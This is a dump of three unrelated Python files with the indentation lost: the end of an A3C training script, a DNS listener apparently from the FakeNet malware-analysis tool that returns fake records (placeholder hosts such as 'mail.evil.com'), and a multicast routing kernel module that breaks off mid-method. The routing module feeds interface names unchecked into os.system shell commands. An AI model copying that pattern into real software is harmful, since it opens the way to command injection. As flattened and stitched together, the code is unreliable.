global_network = GameACFFNetwork(ACTION_SIZE, -1, global_device)
training_threads = []
learning_rate_input = tf.placeholder("float")
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
decay = RMSP_ALPHA,
momentum = 0.0,
epsilon = RMSP_EPSILON,
clip_norm = GRAD_NORM_CLIP,
device = global_device)
for i in range(PARALLEL_SIZE): # For each threading,
device = "/gpu:" + str(i % NUM_GPU) # Separate threads for multiple gpus.
training_thread = A3CTrainingThread(i, global_network, initial_learning_rate,
learning_rate_input,
grad_applier, MAX_TIME_STEP,
device = device)
training_threads.append(training_thread)
# prepare session
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True))
init = tf.global_variables_initializer()
sess.run(init)
# summary for tensorboard
score_input = tf.placeholder(tf.int32)
tf.summary.scalar("score", score_input)
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(LOG_FILE, sess.graph)
# init or load checkpoint with saver
saver = tf.train.Saver()
checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIR)
if checkpoint and checkpoint.model_checkpoint_path:
saver.restore(sess, checkpoint.model_checkpoint_path)
print("checkpoint loaded:", checkpoint.model_checkpoint_path)
tokens = checkpoint.model_checkpoint_path.split("-")
# set global step
global_t = int(tokens[1])
print(">>> global step set: ", global_t)
# set wall time
wall_t_fname = CHECKPOINT_DIR + '/' + 'wall_t.' + str(global_t)
with open(wall_t_fname, 'r') as f:
wall_t = float(f.read())
else:
print("Could not find old checkpoint")
# set wall time
wall_t = 0.0
def train_function(parallel_index):
global global_t
training_thread = training_threads[parallel_index]
# set start_time
start_time = time.time() - wall_t
training_thread.set_start_time(start_time)
while True:
if stop_requested:
break
if global_t > MAX_TIME_STEP:
break
diff_global_t = training_thread.process(sess, global_t, summary_writer,
summary_op, score_input)
global_t += diff_global_t
def signal_handler(signal, frame):
global stop_requested
print('You pressed Ctrl+C!')
stop_requested = True
train_threads = []
for i in range(PARALLEL_SIZE):
train_threads.append(threading.Thread(target=train_function, args=(i,)))
signal.signal(signal.SIGINT, signal_handler)
# set start time
start_time = time.time() - wall_t
for t in train_threads:
t.start()
print('Press Ctrl+C to stop')
signal.pause()
print('Now saving data. Please wait')
for t in train_threads:
t.join()
if not os.path.exists(CHECKPOINT_DIR):
os.mkdir(CHECKPOINT_DIR)
# write wall time
wall_t = time.time() - start_time
wall_t_fname = CHECKPOINT_DIR + '/' + 'wall_t.' + str(global_t)
with open(wall_t_fname, 'w') as f:
f.write(str(wall_t))
saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
|
DNSListener.py
|
import logging
import threading
import netifaces
import SocketServer
from dnslib import *
import ssl
import socket
from . import *
class DNSListener(object):
def taste(self, data, dport):
confidence = 1 if dport is 53 else 0
try:
d = DNSRecord.parse(data)
except:
return confidence
return confidence + 2
def __init__(
self,
config={},
name='DNSListener',
logging_level=logging.INFO,
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.local_ip = '0.0.0.0'
self.server = None
self.name = 'DNS'
self.port = self.config.get('port', 53)
self.logger.info('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
def start(self):
# Start UDP listener
if self.config['protocol'].lower() == 'udp':
self.logger.debug('Starting UDP ...')
self.server = ThreadedUDPServer((self.local_ip, int(self.config.get('port', 53))), self.config, self.logger, UDPHandler)
# Start TCP listener
elif self.config['protocol'].lower() == 'tcp':
self.logger.debug('Starting TCP ...')
self.server = ThreadedTCPServer((self.local_ip, int(self.config.get('port', 53))), self.config, self.logger, TCPHandler)
self.server.nxdomains = int(self.config.get('nxdomains', 0))
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.debug('Stopping...')
# Stop listener
if self.server:
self.server.shutdown()
self.server.server_close()
class DNSHandler():
def parse(self,data):
response = ""
try:
# Parse data as DNS
d = DNSRecord.parse(data)
except Exception, e:
self.server.logger.error('Error: Invalid DNS Request')
self.server.logger.info('%s', '-'*80)
for line in hexdump_table(data):
self.server.logger.info(line)
self.server.logger.info('%s', '-'*80,)
else:
# Only Process DNS Queries
if QR[d.header.qr] == "QUERY":
# Gather query parameters
# NOTE: Do not lowercase qname here, because we want to see
# any case request weirdness in the logs.
qname = str(d.q.qname)
# Chop off the last period
if qname[-1] == '.': qname = qname[:-1]
qtype = QTYPE[d.q.qtype]
self.server.logger.info('Received %s request for domain \'%s\'.', qtype, qname)
# Create a custom response to the query
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
if qtype == 'A':
# Get fake record from the configuration or use the external address
fake_record = self.server.config.get('responsea', None)
# msftncsi does request ipv6 but we only support v4 for now
#TODO integrate into randomized/custom responses. Keep it simple for now.
if 'dns.msftncsi.com' in qname:
fake_record = '131.107.255.225'
# Using socket.gethostbyname(socket.gethostname()) will return
# 127.0.1.1 on Ubuntu systems that automatically add this entry
# to /etc/hosts at install time or at other times. To produce a
# plug-and-play user experience when using FakeNet for Linux,
# we can't ask users to maintain /etc/hosts (which may involve
# resolveconf or other work). Instead, we will give users a
# choice:
#
# * Configure a static IP, e.g. 192.0.2.123
# Returns that IP
#
# * Set the DNS Listener DNSResponse to "GetHostByName"
# Returns socket.gethostbyname(socket.gethostname())
#
# * Set the DNS Listener DNSResponse to "GetFirstNonLoopback"
# Returns the first non-loopback IP in use by the system
#
# If the DNSResponse setting is omitted, the listener will
# default to getting the first non-loopback IPv4 address (for A
# records).
#
# The DNSResponse setting was previously statically set to
# 192.0.2.123, which for local scenarios works fine in Windows
# standalone use cases because all connections to IP addresses
# are redirected by Diverter. Changing the default setting to
#
# IPv6 is not yet implemented, but when it is, it will be
# necessary to consider how to get similar behavior to
if fake_record == 'GetFirstNonLoopback':
for iface in netifaces.interfaces():
for link in netifaces.ifaddresses(iface)[netifaces.AF_INET]:
if 'addr' in link:
addr = link['addr']
if not addr.startswith('127.'):
fake_record = addr
break
elif fake_record == 'GetHostByName' or fake_record is None:
fake_record = socket.gethostbyname(socket.gethostname())
if self.server.nxdomains > 0:
self.server.logger.info('Ignoring query. NXDomains: %d', self.server.nxdomains)
self.server.nxdomains -= 1
else:
self.server.logger.info('Responding with \'%s\'', fake_record)
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
elif qtype == 'MX':
fake_record = self.server.config.get('responsemx', 'mail.evil.com')
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
self.server.logger.info('Responding with \'%s\'', fake_record)
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
elif qtype == 'TXT':
fake_record = self.server.config.get('responsetxt', 'FAKENET')
self.server.logger.info('Responding with \'%s\'', fake_record)
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
return response
class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
try:
(data,sk) = self.request
response = self.parse(data)
if response:
sk.sendto(response, self.client_address)
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror or msg)
except Exception, e:
self.server.logger.error('Error: %s', e)
class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
# Timeout connection to prevent hanging
self.request.settimeout(int(self.server.config.get('timeout', 5)))
try:
data = self.request.recv(1024)
# Remove the addition "length" parameter used in the
# TCP DNS protocol
data = data[2:]
response = self.parse(data)
if response:
# Calculate and add the additional "length" parameter
# used in TCP DNS protocol
length = binascii.unhexlify("%04x" % len(response))
self.request.sendall(length+response)
except socket.timeout:
self.server.logger.warning('Connection timeout.')
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror)
except Exception, e:
self.server.logger.error('Error: %s', e)
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
# Override SocketServer.UDPServer to add extra parameters
def __init__(self, server_address, config, logger, RequestHandlerClass):
self.config = config
self.logger = logger
SocketServer.UDPServer.__init__(self, server_address, RequestHandlerClass)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# Override default value
allow_reuse_address = True
# Override SocketServer.TCPServer to add extra parameters
def __init__(self, server_address, config, logger, RequestHandlerClass):
self.config = config
self.logger = logger
SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass)
def hexdump_table(data, length=16):
hexdump_lines = []
for i in range(0, len(data), 16):
chunk = data[i:i+16]
hex_line = ' '.join(["%02X" % ord(b) for b in chunk ] )
ascii_line = ''.join([b if ord(b) > 31 and ord(b) < 127 else '.' for b in chunk ] )
hexdump_lines.append("%04X: %-*s %s" % (i, length*3, hex_line, ascii_line ))
return hexdump_lines
###############################################################################
# Testing code
def test(config):
print "\t[DNSListener] Testing 'google.com' A record."
query = DNSRecord(q=DNSQuestion('google.com',getattr(QTYPE,'A')))
answer_pkt = query.send('localhost', int(config.get('port', 53)))
answer = DNSRecord.parse(answer_pkt)
print '-'*80
print answer
print '-'*80
print "\t[DNSListener] Testing 'google.com' MX record."
query = DNSRecord(q=DNSQuestion('google.com',getattr(QTYPE,'MX')))
answer_pkt = query.send('localhost', int(config.get('port', 53)))
answer = DNSRecord.parse(answer_pkt)
print '-'*80
print answer
print "\t[DNSListener] Testing 'google.com' TXT record."
query = DNSRecord(q=DNSQuestion('google.com',getattr(QTYPE,'TXT')))
answer_pkt = query.send('localhost', int(config.get('port', 53)))
answer = DNSRecord.parse(answer_pkt)
print '-'*80
print answer
print '-'*80
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '53', 'protocol': 'UDP', 'responsea': '127.0.0.1', 'responsemx': 'mail.bad.com', 'responsetxt': 'FAKENET', 'nxdomains': 3 }
listener = DNSListener(config, logging_level = logging.DEBUG)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
test(config)
if __name__ == '__main__':
main()
|
Kernel.py
|
import os
import socket
import struct
import ipaddress
import traceback
from socket import if_nametoindex
from threading import RLock, Thread
from abc import abstractmethod, ABCMeta
from pimdm import UnicastRouting, Main
from pimdm.rwlock.RWLock import RWLockWrite
from pimdm.tree import pim_globals
from mld.InterfaceMLD import InterfaceMLD
from igmp.InterfaceIGMP import InterfaceIGMP
from pimdm.InterfacePIM import InterfacePim
from pimdm.InterfacePIM6 import InterfacePim6
from pimdm.tree.KernelEntry import KernelEntry
from pimdm.tree.KernelEntryInterface import KernelEntry4Interface, KernelEntry6Interface
class Kernel(metaclass=ABCMeta):
# Max Number of Virtual Interfaces
MAXVIFS = 32
def __init__(self, kernel_socket):
# Kernel is running
self.running = True
# KEY : interface_ip, VALUE : vif_index
self.vif_index_to_name_dic = {} # KEY : vif_index, VALUE : interface_name
self.vif_name_to_index_dic = {} # KEY : interface_name, VALUE : vif_index
# KEY : source_ip, VALUE : {group_ip: KernelEntry}
self.routing = {}
self.socket = kernel_socket
self.rwlock = RWLockWrite()
self.interface_lock = RLock()
# Create register interface
# todo useless in PIM-DM... useful in PIM-SM
#self.create_virtual_interface("0.0.0.0", "pimreg", index=0, flags=Kernel.VIFF_REGISTER)
# interfaces being monitored by this process
self.pim_interface = {} # name: interface_pim
self.membership_interface = {} # name: interface_igmp or interface_mld
# logs
self.interface_logger = Main.logger.getChild('KernelInterface')
self.tree_logger = Main.logger.getChild('KernelTree')
# receive signals from kernel with a background thread
handler_thread = Thread(target=self.handler)
handler_thread.daemon = True
handler_thread.start()
'''
Structure to create/remove virtual interfaces
struct vifctl {
vifi_t vifc_vifi; /* Index of VIF */
unsigned char vifc_flags; /* VIFF_ flags */
unsigned char vifc_threshold; /* ttl limit */
unsigned int vifc_rate_limit; /* Rate limiter values (NI) */
union {
struct in_addr vifc_lcl_addr; /* Local interface address */
int vifc_lcl_ifindex; /* Local interface index */
};
struct in_addr vifc_rmt_addr; /* IPIP tunnel addr */
};
'''
@abstractmethod
def create_virtual_interface(self, ip_interface: str or bytes, interface_name: str, index, flags=0x0):
raise NotImplementedError
def create_pim_interface(self, interface_name: str, state_refresh_capable:bool):
with self.interface_lock:
pim_interface = self.pim_interface.get(interface_name)
membership_interface = self.membership_interface.get(interface_name)
vif_already_exists = pim_interface or membership_interface
if pim_interface:
# already exists
pim_interface.set_state_refresh_capable(state_refresh_capable)
return
elif membership_interface:
index = membership_interface.vif_index
else:
index = list(range(0, self.MAXVIFS) - self.vif_index_to_name_dic.keys())[0]
ip_interface = None
if interface_name not in self.pim_interface:
pim_interface = self._create_pim_interface_object(interface_name, index, state_refresh_capable)
self.pim_interface[interface_name] = pim_interface
ip_interface = pim_interface.ip_interface
if not vif_already_exists:
self.create_virtual_interface(ip_interface=ip_interface, interface_name=interface_name, index=index)
@abstractmethod
def _create_pim_interface_object(self, interface_name, index, state_refresh_capable):
raise NotImplementedError
def create_membership_interface(self, interface_name: str):
with self.interface_lock:
pim_interface = self.pim_interface.get(interface_name)
membership_interface = self.membership_interface.get(interface_name)
vif_already_exists = pim_interface or membership_interface
if membership_interface:
# already exists
return
elif pim_interface:
index = pim_interface.vif_index
else:
index = list(range(0, self.MAXVIFS) - self.vif_index_to_name_dic.keys())[0]
if interface_name not in self.membership_interface:
membership_interface = self._create_membership_interface_object(interface_name, index)
self.membership_interface[interface_name] = membership_interface
ip_interface = membership_interface.ip_interface
if not vif_already_exists:
self.create_virtual_interface(ip_interface=ip_interface, interface_name=interface_name, index=index)
membership_interface.enable()
@abstractmethod
def _create_membership_interface_object(self, interface_name, index):
raise NotImplementedError
def remove_interface(self, interface_name, membership: bool = False, pim: bool = False):
with self.interface_lock:
pim_interface = self.pim_interface.get(interface_name)
membership_interface = self.membership_interface.get(interface_name)
if (membership and not membership_interface) or (pim and not pim_interface) or (not membership and not pim):
return
if pim:
pim_interface = self.pim_interface.pop(interface_name)
pim_interface.remove()
elif membership:
membership_interface = self.membership_interface.pop(interface_name)
membership_interface.remove()
if not self.membership_interface.get(interface_name) and not self.pim_interface.get(interface_name):
self.remove_virtual_interface(interface_name)
@abstractmethod
def remove_virtual_interface(self, interface_name):
raise NotImplementedError
#############################################
# Manipulate multicast routing table
#############################################
@abstractmethod
def set_multicast_route(self, kernel_entry: KernelEntry):
raise NotImplementedError
@abstractmethod
def set_flood_multicast_route(self, source_ip, group_ip, inbound_interface_index):
raise NotImplementedError
@abstractmethod
def remove_multicast_route(self, kernel_entry: KernelEntry):
raise NotImplementedError
@abstractmethod
def exit(self):
raise NotImplementedError
@abstractmethod
def handler(self):
raise NotImplementedError
def get_routing_entry(self, source_group: tuple, create_if_not_existent=True):
ip_src = source_group[0]
ip_dst = source_group[1]
with self.rwlock.genRlock():
if ip_src in self.routing and ip_dst in self.routing[ip_src]:
return self.routing[ip_src][ip_dst]
with self.rwlock.genWlock():
if ip_src in self.routing and ip_dst in self.routing[ip_src]:
return self.routing[ip_src][ip_dst]
elif create_if_not_existent:
kernel_entry = KernelEntry(ip_src, ip_dst, self._get_kernel_entry_interface())
if ip_src not in self.routing:
self.routing[ip_src] = {}
iif = UnicastRouting.check_rpf(ip_src)
self.set_flood_multicast_route(ip_src, ip_dst, iif)
self.routing[ip_src][ip_dst] = kernel_entry
return kernel_entry
else:
return None
@staticmethod
@abstractmethod
def _get_kernel_entry_interface():
pass
# notify KernelEntries about changes at the unicast routing table
def notify_unicast_changes(self, subnet):
with self.rwlock.genWlock():
for source_ip in list(self.routing.keys()):
source_ip_obj = ipaddress.ip_address(source_ip)
if source_ip_obj not in subnet:
continue
for group_ip in list(self.routing[source_ip].keys()):
self.routing[source_ip][group_ip].network_update()
# notify about changes at the interface (IP)
'''
def notify_interface_change(self, interface_name):
with self.interface_lock:
# check if interface was already added
if interface_name not in self.vif_name_to_index_dic:
return
print("trying to change ip")
pim_interface = self.pim_interface.get(interface_name)
if pim_interface:
old_ip = pim_interface.get_ip()
pim_interface.change_interface()
new_ip = pim_interface.get_ip()
if old_ip != new_ip:
self.vif_dic[new_ip] = self.vif_dic.pop(old_ip)
igmp_interface = self.igmp_interface.get(interface_name)
if igmp_interface:
igmp_interface.change_interface()
'''
# When interface changes number of neighbors verify if olist changes and prune/forward respectively
def interface_change_number_of_neighbors(self):
with self.rwlock.genRlock():
for groups_dict in self.routing.values():
for entry in groups_dict.values():
entry.change_at_number_of_neighbors()
# When new neighbor connects try to resend last state refresh msg (if AssertWinner)
def new_or_reset_neighbor(self, vif_index, neighbor_ip):
with self.rwlock.genRlock():
for groups_dict in self.routing.values():
for entry in groups_dict.values():
entry.new_or_reset_neighbor(vif_index, neighbor_ip)
class Kernel4(Kernel):
# MRT
MRT_BASE = 200
MRT_INIT = (MRT_BASE) # /* Activate the kernel mroute code */
MRT_DONE = (MRT_BASE + 1) # /* Shutdown the kernel mroute */
MRT_ADD_VIF = (MRT_BASE + 2) # /* Add a virtual interface */
MRT_DEL_VIF = (MRT_BASE + 3) # /* Delete a virtual interface */
MRT_ADD_MFC = (MRT_BASE + 4) # /* Add a multicast forwarding entry */
MRT_DEL_MFC = (MRT_BASE + 5) # /* Delete a multicast forwarding entry */
MRT_VERSION = (MRT_BASE + 6) # /* Get the kernel multicast version */
MRT_ASSERT = (MRT_BASE + 7) # /* Activate PIM assert mode */
MRT_PIM = (MRT_BASE + 8) # /* enable PIM code */
MRT_TABLE = (MRT_BASE + 9) # /* Specify mroute table ID */
#MRT_ADD_MFC_PROXY = (MRT_BASE + 10) # /* Add a (*,*|G) mfc entry */
#MRT_DEL_MFC_PROXY = (MRT_BASE + 11) # /* Del a (*,*|G) mfc entry */
#MRT_MAX = (MRT_BASE + 11)
# Max Number of Virtual Interfaces
MAXVIFS = 32
# SIGNAL MSG TYPE
IGMPMSG_NOCACHE = 1
IGMPMSG_WRONGVIF = 2
IGMPMSG_WHOLEPKT = 3 # NOT USED ON PIM-DM
# Interface flags
VIFF_TUNNEL = 0x1 # IPIP tunnel
VIFF_SRCRT = 0x2 # NI
VIFF_REGISTER = 0x4 # register vif
VIFF_USE_IFINDEX = 0x8 # use vifc_lcl_ifindex instead of vifc_lcl_addr to find an interface
def __init__(self):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IGMP)
# MRT TABLE
if pim_globals.MULTICAST_TABLE_ID != 0:
try:
s.setsockopt(socket.IPPROTO_IP, self.MRT_TABLE, pim_globals.MULTICAST_TABLE_ID)
except:
traceback.print_exc()
# MRT INIT
s.setsockopt(socket.IPPROTO_IP, self.MRT_INIT, 1)
# MRT PIM
s.setsockopt(socket.IPPROTO_IP, self.MRT_PIM, 0)
s.setsockopt(socket.IPPROTO_IP, self.MRT_ASSERT, 1)
super().__init__(s)
'''
Structure to create/remove virtual interfaces
struct vifctl {
vifi_t vifc_vifi; /* Index of VIF */
unsigned char vifc_flags; /* VIFF_ flags */
unsigned char vifc_threshold; /* ttl limit */
unsigned int vifc_rate_limit; /* Rate limiter values (NI) */
union {
struct in_addr vifc_lcl_addr; /* Local interface address */
int vifc_lcl_ifindex; /* Local interface index */
};
struct in_addr vifc_rmt_addr; /* IPIP tunnel addr */
};
'''
def create_virtual_interface(self, ip_interface: str or bytes, interface_name: str, index, flags=0x0):
if type(ip_interface) is str:
ip_interface = socket.inet_aton(ip_interface)
struct_mrt_add_vif = struct.pack("HBBI 4s 4s", index, flags, 1, 0, ip_interface,
socket.inet_aton("0.0.0.0"))
os.system("ip mrule del iif {}".format(interface_name))
os.system("ip mrule del oif {}".format(interface_name))
if pim_globals.MULTICAST_TABLE_ID != 0:
os.system("ip mrule add iif {} lookup {}".format(interface_name, pim_globals.MULTICAST_TABLE_ID))
os.system("ip mrule add oif {} lookup {}".format(interface_name, pim_globals.MULTICAST_TABLE_ID))
with self.rwlock.genWlock():
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_ADD_VIF, struct_mrt_add_vif)
self.vif_index_to_name_dic[index] = interface_name
self.vif_name_to_index_dic[interface_name] = index
for source_dict in list(self.routing.values()):
for kernel_entry in list(source_dict.values()):
kernel_entry.new_interface(index)
self.interface_logger.debug('Create virtual interface: %s -> %d', interface_name, index)
return index
def remove_virtual_interface(self, interface_name):
#with self.interface_lock:
index = self.vif_name_to_index_dic.pop(interface_name, None)
struct_vifctl = struct.pack("HBBI 4s 4s", index, 0, 0, 0, socket.inet_aton("0.0.0.0"), socket.inet_aton("0.0.0.0"))
os.system("ip mrule del iif {}".format(interface_name))
os.system("ip mrule del oif {}".format(interface_name))
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_DEL_VIF, struct_vifctl)
del self.vif_name_to_index_dic[self.vif_index_to_name_dic[index]]
interface_name = self.vif_index_to_name_dic.pop(index)
# change MFC's to not forward traffic by this interface (set OIL to 0 for this interface)
with self.rwlock.genWlock():
for source_dict in list(self.routing.values()):
for kernel_entry in list(source_dict.values()):
kernel_entry.remove_interface(index)
self.interface_logger.debug('Remove virtual interface: %s -> %d', interface_name, index)
'''
/* Cache manipulation structures for mrouted and PIMd */
struct mfcctl {
struct in_addr mfcc_origin; /* Origin of mcast */
struct in_addr mfcc_mcastgrp; /* Group in question */
vifi_t mfcc_parent; /* Where it arrived */
unsigned char mfcc_ttls[MAXVIFS]; /* Where it is going */
unsigned int mfcc_pkt_cnt; /* pkt count for src-grp */
unsigned int mfcc_byte_cnt;
unsigned int mfcc_wrong_if;
int mfcc_expire;
};
'''
def set_multicast_route(self, kernel_entry: KernelEntry):
source_ip = socket.inet_aton(kernel_entry.source_ip)
group_ip = socket.inet_aton(kernel_entry.group_ip)
outbound_interfaces = kernel_entry.get_outbound_interfaces_indexes()
if len(outbound_interfaces) != Kernel.MAXVIFS:
raise Exception
#outbound_interfaces_and_other_parameters = list(kernel_entry.outbound_interfaces) + [0]*4
outbound_interfaces_and_other_parameters = outbound_interfaces + [0]*4
#outbound_interfaces, 0, 0, 0, 0 <- only works with python>=3.5
#struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces, 0, 0, 0, 0)
struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, kernel_entry.inbound_interface_index, *outbound_interfaces_and_other_parameters)
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_ADD_MFC, struct_mfcctl)
def set_flood_multicast_route(self, source_ip, group_ip, inbound_interface_index):
source_ip = socket.inet_aton(source_ip)
group_ip = socket.inet_aton(group_ip)
outbound_interfaces = [1]*self.MAXVIFS
outbound_interfaces[inbound_interface_index] = 0
#outbound_interfaces_and_other_parameters = list(kernel_entry.outbound_interfaces) + [0]*4
outbound_interfaces_and_other_parameters = outbound_interfaces + [0]*3 + [20]
#outbound_interfaces, 0, 0, 0, 0 <- only works with python>=3.5
#struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces, 0, 0, 0, 0)
struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, inbound_interface_index, *outbound_interfaces_and_other_parameters)
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_ADD_MFC, struct_mfcctl)
def remove_multicast_route(self, kernel_entry: KernelEntry):
source_ip = socket.inet_aton(kernel_entry.source_ip)
group_ip = socket.inet_aton(kernel_entry.group_ip)
outbound_interfaces_and_other_parameters = [0] + [0]*Kernel.MAXVIFS + [0]*4
struct_mfcctl = struct.pack("4s 4s H " + "B"*Kernel.MAXVIFS + " IIIi", source_ip, group_ip, *outbound_interfaces_and_other_parameters)
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_DEL_MFC, struct_mfcctl)
self.routing[kernel_entry.source_ip].pop(kernel_entry.group_ip)
if len(self.routing[kernel_entry.source_ip]) == 0:
self.routing.pop(kernel_entry.source_ip)
def exit(self):
self.running = False
# MRT DONE
self.socket.setsockopt(socket.IPPROTO_IP, self.MRT_DONE, 1)
self.socket.close()
'''
/* This is the format the mroute daemon expects to see IGMP control
* data. Magically happens to be like an IP packet as per the original
*/
struct igmpmsg {
__u32 unused1,unused2;
unsigned char im_msgtype; /* What is this */
unsigned char im_mbz; /* Must be zero */
unsigned char im_vif; /* Interface (this ought to be a vifi_t!) */
unsigned char unused3;
struct in_addr im_src,im_dst;
};
'''
def handler(self):
while self.running:
try:
msg = self.socket.recv(20)
(_, _, im_msgtype, im_mbz, im_vif, _, im_src, im_dst) = struct.unpack("II B B B B 4s 4s", msg[:20])
print((im_msgtype, im_mbz, socket.inet_ntoa(im_src), socket.inet_ntoa(im_dst)))
if im_mbz != 0:
continue
print(im_msgtype)
print(im_mbz)
print(im_vif)
print(socket.inet_ntoa(im_src))
print(socket.inet_ntoa(im_dst))
#print((im_msgtype, im_mbz, socket.inet_ntoa(im_src), socket.inet_ntoa(im_dst)))
ip_src = socket.inet_ntoa(im_src)
ip_dst = socket.inet_ntoa(im_dst)
if im_msgtype == self.IGMPMSG_NOCACHE:
print("IGMP NO CACHE")
self.igmpmsg_nocache_handler(ip_src, ip_dst, im_vif)
elif im_msgtype == self.IGMPMSG_WRONGVIF:
print("WRONG VIF HANDLER")
self.igmpmsg_wrongvif_handler(ip_src, ip_dst, im_vif)
#elif im_msgtype == Kernel.IGMPMSG_WHOLEPKT:
# print("IGMP_WHOLEPKT")
# self.igmpmsg_wholepacket_handler(ip_src, ip_dst)
else:
raise Exception
except Exception:
traceback.print_exc()
continue
# receive multicast (S,G) packet and multicast routing table has no (S,G) entry
def igmpmsg_nocache_handler(self, ip_src, ip_dst, iif):
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg(iif)
# receive multicast (S,G) packet in a outbound_interface
def igmpmsg_wrongvif_handler(self, ip_src, ip_dst, iif):
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg(iif)
''' useless in PIM-DM... useful in PIM-SM
def igmpmsg_wholepacket_handler(self, ip_src, ip_dst):
#kernel_entry = self.routing[(ip_src, ip_dst)]
source_group_pair = (ip_src, ip_dst)
self.get_routing_entry(source_group_pair, create_if_not_existent=True).recv_data_msg()
#kernel_entry.recv_data_msg(iif)
'''
@staticmethod
def _get_kernel_entry_interface():
return KernelEntry4Interface
def _create_pim_interface_object(self, interface_name, index, state_refresh_capable):
return InterfacePim(interface_name, index, state_refresh_capable)
def _create_membership_interface_object(self, interface_name, index):
return InterfaceIGMP(interface_name, index)
class Kernel6(Kernel):
# MRT6
MRT6_BASE = 200
MRT6_INIT = (MRT6_BASE) # /* Activate the kernel mroute code */
MRT6_DONE = (MRT6_BASE + 1) # /* Shutdown the kernel mroute */
MRT6_ADD_MIF = (MRT6_BASE + 2) # /* Add a virtual interface */
MRT6_DEL_MIF = (MRT6_BASE + 3) # /* Delete a virtual interface */
MRT6_ADD_MFC = (MRT6_BASE + 4) # /* Add a multicast forwarding entry */
MRT6_DEL_MFC = (MRT6_BASE + 5) # /* Delete a multicast forwarding entry */
MRT6_VERSION = (MRT6_BASE + 6) # /* Get the kernel multicast version */
MRT6_ASSERT = (MRT6_BASE + 7) # /* Activate PIM assert mode */
MRT6_PIM = (MRT6_BASE + 8) # /* enable PIM code */
MRT6_TABLE = (MRT6_BASE + 9) # /* Specify mroute table ID */
MRT6_ADD_MFC_PROXY = (MRT6_BASE + 10) # /* Add a (*,*|G) mfc entry */
MRT6_DEL_MFC_PROXY = (MRT6_BASE + 11) # /* Del a (*,*|G) mfc entry */
MRT6_MAX = (MRT6_BASE + 11)
# define SIOCGETMIFCNT_IN6 SIOCPROTOPRIVATE /* IP protocol privates */
# define SIOCGETSGCNT_IN6 (SIOCPROTOPRIVATE+1)
# define SIOCGETRPF (SIOCPROTOPRIVATE+2)
# Max Number of Virtual Interfaces
MAXVIFS = 32
# SIGNAL MSG TYPE
MRT6MSG_NOCACHE = 1
MRT6MSG_WRONGMIF = 2
MRT6MSG_WHOLEPKT = 3 # /* used for use level encap */
# Interface flags
MIFF_REGISTER = 0x1 # /* register vif */
def __init__(self):
s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
# MRT TABLE
if pim_globals.MULTICAST_TABLE_ID != 0:
try:
s.setsockopt(socket.IPPROTO_IPV6, self.MRT6_TABLE, pim_globals.MULTICAST_TABLE_ID)
except:
traceback.print_exc()
# MRT INIT
s.setsockopt(socket.IPPROTO_IPV6, self.MRT6_INIT, 1)
# MRT PIM
s.setsockopt(socket.IPPROTO_IPV6, self.MRT6_PIM, 0)
s.setsockopt(socket.IPPROTO_IPV6, self.MRT6_ASSERT, 1)
super().__init__(s)
'''
Structure to create/remove multicast interfaces
struct mif6ctl {
mifi_t mif6c_mifi; /* Index of MIF */
unsigned char mif6c_flags; /* MIFF_ flags */
unsigned char vifc_threshold; /* ttl limit */
__u16 mif6c_pifi; /* the index of the physical IF */
unsigned int vifc_rate_limit; /* Rate limiter values (NI) */
};
'''
def create_virtual_interface(self, ip_interface, interface_name: str, index, flags=0x0):
physical_if_index = if_nametoindex(interface_name)
struct_mrt_add_vif = struct.pack("HBBHI", index, flags, 1, physical_if_index, 0)
os.system("ip -6 mrule del iif {}".format(interface_name))
os.system("ip -6 mrule del oif {}".format(interface_name))
if pim_globals.MULTICAST_TABLE_ID != 0:
os.system("ip -6 mrule add iif {} lookup {}".format(interface_name, pim_globals.MULTICAST_TABLE_ID))
